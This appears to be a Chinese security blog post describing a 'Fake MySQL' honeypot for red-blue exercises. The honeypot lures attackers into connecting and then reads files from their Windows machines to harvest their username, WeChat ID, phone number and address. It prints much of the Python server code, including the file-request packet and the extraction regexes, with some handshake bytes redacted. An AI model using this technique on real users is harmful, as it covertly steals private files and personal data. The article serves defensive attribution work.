通过蜜罐技术获取攻击者手机号、微信号

VSole2022-03-23 06:31:59

‍相关声明

以下内容仅限用于红蓝攻防对抗等专业领域,请勿用于非法用途。

杂谈

首先,我们先讲一下蜜罐的概念,你可以简单理解较为蜜罐就是一个陷阱,故意暴露一些我们人为设计好的漏洞,让攻击者自投罗网。

蜜罐介绍

蜜罐是对攻击者的欺骗技术,用以监视、检测、分析和溯源攻击行为,其没有业务上的用途,所有流入/流出蜜罐的流量都预示着扫描或者攻击行为,因此可以比较好的聚焦于攻击流量。

蜜罐可以实现对攻击者的主动诱捕,能够详细地记录攻击者攻击过程中的许多痕迹,可以收集到大量有价值的数据,如病毒或蠕虫的源码、黑客的操作等,从而便于提供丰富的溯源数据。另外蜜罐也可以消耗攻击者的时间,基于JSONP等方式来获取攻击者的画像。

但是蜜罐存在安全隐患,如果没有做好隔离,可能成为新的攻击源。

Fake Mysql

这里再提一下Fake Mysql的概念,通过伪装Mysql服务器,诱导攻击者来连接,利用漏洞来读取攻击者电脑的文件从而就有了下面的内容

蜜罐技术获取手机号、微信号、地址

那么如何通过这种技术获取攻击者的手机号和微信呢?

正常获取的思路

我们先来讲一下读取手机号和微信ID的正常方法,分为以下三个步骤

  • 通过C:/Windows/PFRO.log获取windows用户名
  • 通过C:/Users/用户名/Documents/WeChat Files/All Users/config/config.data获取wxid
  • 通过C:/Users/用户名/Documents/WeChat Files/wx_id/config/AccInfo.dat获取地址、微信号、手机号

获取windows用户名

我们这里在自己的电脑中进行测试,打开C:/Windows/PFRO.log,可以看到我的用户名是66396


获取wxid

然后,我们访问C:/Users/66396/Documents/WeChat Files/All Users/config/config.data

这里可以获取到wxid

获取手机号、微信号、地址

可以看到手机号


还有地址、微信号都有

上面是黑客入侵后,查看电脑中的文件可以获取到的信息,那么如何设计一个蜜罐,让黑客在攻击时自投罗网,帮助我们防守方溯源到攻击者的信息呢?

核心代码

如何把上述过程进行自动化呢?我们可以看下核心代码

下面的代码主要有两个作用

1.判断是否为扫描器或者密码爆破工具,进行交互握手,效果是扫描器直接爆3306弱口令。

2.如果是直接连接,去读取设定好的文件,并写入本地保存。

def mysql_get_file_content(filename,conn,address):    logpath = os.path.abspath('.') + "/log/" + address[0]if not os.path.exists(logpath):        os.makedirs(logpath)    conn.sendall("xxx")try:        conn.recv(1024000)except Exception as e:        print(e)
try:        conn.sendall("xx")        res1 = conn.recv(1024000)# SHOW VARIABLESif 'SHOW VARIABLES' in res1:            conn.sendall("xxx")            res2 = conn.recv(9999)if 'SHOW WARNINGS' in res2:                conn.sendall("xxx")                res3 = conn.recv(9999)if 'SHOW COLLATION' in res3:                    conn.sendall("xxx")                    res4 = conn.recv(9999)if 'SET NAMES utf8' in res4:                        conn.sendall("xxx")                        res5 = conn.recv(9999)if 'SET character_set_results=NULL' in res5:                            conn.sendall("xxx")                            conn.close()else:                        conn.close()else:                    conn.close()else:                conn.close()else:try:                wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename                conn.sendall(wantfile)                content=''while True:                    data = conn.recv(1024)print len(data)                    content += dataif len(data) < 1024:print 'ok'break
                conn.close()                item=logpath + "/" + filename.replace("/", "_").replace(":", "")+'_'+str(random.random())if len(content) > 6:with open(item, "w") as f:                        f.write(content)                        f.close()return (True,content)else:return (False,content)except Exception as e:print (e)except Exception as e:print (e)

为了防止读取文件内容不完整,可以加入while循环。

while True:        conn, address = sv.accept()        first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")global files1global usernameglobal wx_id        file=files1[0].replace('Administrator',username).replace('wx_id',wx_id)        res,content = mysql_get_file_content(file,conn,address)        files1.append(files1[0])        files1.remove(files1[0])if res:if 'PFRO' in file:                username = get_username(content)                s= "xx" % (xx)                cursor.execute(s)                data = cursor.fetchall()if len(data)==0:                    s = "XX" % (xx)                    cursor.execute(s)                    db.commit()print 'success:'+ file                    insert_file(file,address,username)elif 'config.data'in file:                content = content                wxid = re.findall(r'WeChatFiles\\(.*)\\config', content)[0]                sql = "xxx" % (xxx)                cursor.execute(sql)                db.commit()                wx_id=wxid                img = qrcode.make('weixin://contacts/profile/'+wxid)                img.save(os.path.abspath('.')+'/static/pic/'+wxid+'.png') print 'success:'+ file                insert_file(file,address,username)elif 'AccInfo' in file:                content = content                phone = re.findall(r'[0-9]{11}', content)[-1]                sql = "xxx" % (xxx)                cursor.execute(sql)                db.commit()print 'success:'+ file                insert_file(file,address,username)else:            files1=files            username='Administrator'

工具下载:

关注HACK之道公众号回复:蜜罐,获取工具下载地址

当然,热心网友们最关心的还是工具效果展示,我们可以进行测试

我们需要先将工具下载下来传入服务器

然后修改webServer.py中admin的密码,当然,你也可以更换用户名,这个根据个人习惯来修改。

然后通过docker启用服务

然后运行本项目

docker-compose up -d


docker-compose up -d

使用方法

攻击者通常会发现我们网站的一些漏洞,我们这里使用蜜罐技术,故意暴露我们的数据库,我们数据库这里设置弱口令,让攻击者可以连接。

攻击者在使用navicat连接我们的数据库时成功后,我们可以执行代码,读取到它的手机号、微信号、地址

并可以在5000端口访问后台,输入我们刚才设置的admin以及密码fancypig

然后就可以看到攻击者信息了!

内容来源:https://www.iculture.cc/knowledge/pig=10727

信息安全蜜罐技术
本作品采用《CC 协议》,转载必须注明作者和本文链接
从市场的前端产品标准来看,现在行业内只要做工控安全,必然要提到“白名单”技术理念。郭洋说到,信息安全标准是我国信息安全保障体系的重要组成部分。构建“1246”网络安全防护体系 郭洋认为,三分技术、七分管理,是做好工控安全的箴言。目前工业企业工控安全面临着网络结构风险、防护能力风险、业务软件风险、实施运维风险、工业协议风险、安全预警风险6大风险问题。
当前国家形势的驱使,国家信息安全的发展经济水平的不断提升,就需要不断的提升综合国力而网络安全领域的对抗也是我国核心竞争力的一种优势;本质上是人与人之间的对抗,而网络终端、网络设备、介质以及各种工具和平台仅仅是作为辅助手段而存在。因此如何使网络安全人员合理的利用手中的各种工具和策略来提高网络安全对抗水平,是培养“高素质的网络安全和信息化人才队伍”亟需解决的问题。网络攻防演练成为各企事业单位,乃至国家
红蓝对抗—蓝队手册
2022-03-18 14:22:22
红蓝对抗的主要目的在于,提高公司安全成熟度及其检测和响应攻击的能力。
2021年12月22日,“2021年中国联通总部信息安全威胁狩猎平台新增迭代开发项目”发布项目公告,该项目以最高限价729.8万元招标“威胁狩猎平台应用软件一套”,且招标文件里非常详细地标明了采购需求与参数要求,在蜜罐类产品的市场需求上具有较为典型的参考价值,建议关注蜜罐类产品的甲乙方安全从业者参考。
0x01 同源策略 浏览器沙盒、同源策略是浏览器中的两个安全机制。图5.jsonp劫持流程0x03 JSONP劫持漏洞的危害 JSONP劫持是一种敏感信息泄露的漏洞,经过攻击者巧妙而持久地利用,会对企业和用户造成巨大的危害。不同:1.JSONP劫持必须找到跨站请求资源的接口来实施攻击,需要传回回调函数。
但随着工业互联网的发展,信息安全问题也逐渐成为影响数字工业可持续发展的重要因素。结合工业领域数字化发展与整体安全需求,天融信率先提出将功能安全与信息安全充分融合的“双安融合”理念,将功能安全与信息安全进行有效融合,有效落实安全生产的最终目标,护航工业互联网安全。全球活跃物联网终端设备数量增长迅速,互联网面临的攻击也在逐年提升,数据隐患加大。
大数据、云计算等信息技术的发展,加速了信息化发展速度,同样刺激了网络攻击的普遍化、持久化、武器化,也给攻击溯源带来了新挑战。传统的溯源技术大都针对某一类 或某几类的数据进行分析,还原攻击过程,且溯源过程需要大量的人工介入。从攻击溯源的 基本思路入手,结合大数据技术特点,以及大数据安全产品的开发经验,提出一种基于大数 据技术的多层溯源框架,对多元数据进行分析,绘制尽可能完整的攻击路径,还原攻击全过程
威努特作为中国工控安全领军者,始终专注于守护我国关键信息基础设施网络空间安全,并持续关注和参与到“智改数转”的建设,助力工业信息安全的发展。
全球性安全威胁的格局每年都在演化。为了应对2018年的威胁,企业必须了解这五大全球性网络威胁。 如果你认为2017年对于数据泄露来说是可怕的一年,那么2018年走着瞧。信息安全论坛(ISF)是一个专注于网络安全和信息风险管理的全球性独立信息安全机构,它预测数据泄露的数量和影响会增大,这在很大程度上要归咎于组织将在2018年面临的五大全球性安全威胁。
云计算的出现彻底改变了 IT 产业和传统企业的 IT 结构,但大部分企业的理念和技术方法还停留在传统的 IT 时代,很多企业只是把云当成更大的服务器集群来使用,并没有认识到云所带来的底层技术上的本质性变革。这种理念的差异造成的最直接后果就是安全管理水平的滞后,云安全需要用新的安全管理思路和技术手段来应对。
VSole
网络安全专家